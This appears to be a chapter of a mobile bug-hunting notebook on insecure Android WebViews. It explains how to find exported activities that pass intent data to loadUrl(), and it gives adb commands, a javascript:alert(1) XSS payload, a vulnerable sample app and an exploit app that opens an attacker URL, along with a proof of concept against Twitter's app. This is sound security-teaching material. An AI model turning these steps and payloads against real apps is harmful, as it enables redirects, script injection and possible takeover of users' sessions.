4. Insecure Web view

Methods to find a bug

Rough Note :

1. Check for Manifest.xml -> Webview.java
2. Open jadx and open the application
3. go to manifest and Check activity with exported=true (or) 
4. check for Intent Filter 
5. Now check the activity has intent filter with action <action android:name="android.intent.action.*" /> or exported=true
6. search for loadurl()
7. Now check the loadurl() if any data accepting from intent or not
8. If we found Indent filter with action or exported only we can able to found this bug
9. get intent , get data -> oncreate(), onrestart() 

To Exploit
adb shell
am start -a android.intent.action.VIEW -d "https//example.com" com.package.example/.MainActivity -> (give package name and put .class name)
(or)
am start -a android.intent.action.VIEW -d "https//example.com" -n com.package.example/.MainActivity
we can do redirect, xss and RCE also
use [email protected] -> To bypass restriction

Steps :-
		1) Open jadx and open the application
		2) Search for loadUrl()
		3) Now check that activity has intent filter with  <action android:name="android.intent.action.*" /> or exported
		4) Now Check the loadUrl() if any data accepting from intent or not



    onCreate() , onResume() , onStart() , onRestart()


    adb exploit :- am start -a android.intent.action.VIEW -d "https://karthi-the-hacker.github.io/cv/" arbitry url load
    adb exploit :- am start -a android.intent.action.VIEW -d "javascript:alert(1)"  xss

	Sample vulnearble Code :-

		Package name :- com.karthithehacker.insecurewebview

			AndroidManifest.xml:-
				<activity android:name=".webview" android:exported="true"></activity>
					or
				 <activity android:name=".webview">
   				         <intent-filter>
            					    <action android:name="android.intent.action.MAIN" />
				         </intent-filter>
				</activity>

			webview.java :-
				 protected void onCreate(Bundle savedInstanceState) {
        				super.onCreate(savedInstanceState);
        				setContentView(R.layout.activity_webview);

        				web = (WebView)findViewById(R.id.web);
        				WebSettings webSettings = web.getSettings();
        				webSettings.setJavaScriptEnabled(true);
        				web.setWebViewClient(new WebViewClient());
       					Intent data = new Intent();
       					url = getIntent().getDataString();

        				if (url != null){
            					web.loadUrl(url); // vulnerable line
        				}
        				else {
            					web.loadUrl("https://instagram.com/karthi_the_hacker");
        				}

    				}

   				public void onBackPressed() {
        				if (web.canGoBack()) {
         				   web.goBack();
        				} else {
          					  super.onBackPressed();

        					}
    				}

			Exploit code :-
				protected void onCreate(Bundle savedInstanceState) {
        				super.onCreate(savedInstanceState);
        				setContentView(R.layout.activity_webview);
					      Intent data = new Intent();
        				data.setClassName("com.karthithehacker.insecurewebview","com.karthithehacker.insecurewebview.webview");
        				data.setData(Uri.parse("http://cappriciosec.com/"));
        				startActivity(data);
				}

PoC 1

Live twiter hunting

private void f() {


               else {
                   this.a.loadUrl(e.a(getIntent().getStringExtra("android.intent.extra.TEXT")).toString());
               }

               a = webview
               WebView.loadurl("https://mobile.twitter.com/?utm_source=apk&utm_medium=shortcut 'onload=alert(1);");





               private void g() {
                      Uri data = getIntent().getData(); ///vulnerable line
                      if (data != null) {
                          Uri e = vw.e(data);
                          String queryParameter = e.getQueryParameter("mat_click_id");
                          ApkRwebInterface.setReferrerUrl(e.toString());
                          ApkRwebInterface.setMatClickId(queryParameter);
                      }
                  }

PoC 2

PoC 3

PoC 4

PoC 5

OPPO Insecure Web View

Previous3. Firebase db url misconfigure Next5. Browsable Intent attack

Last updated 1 year ago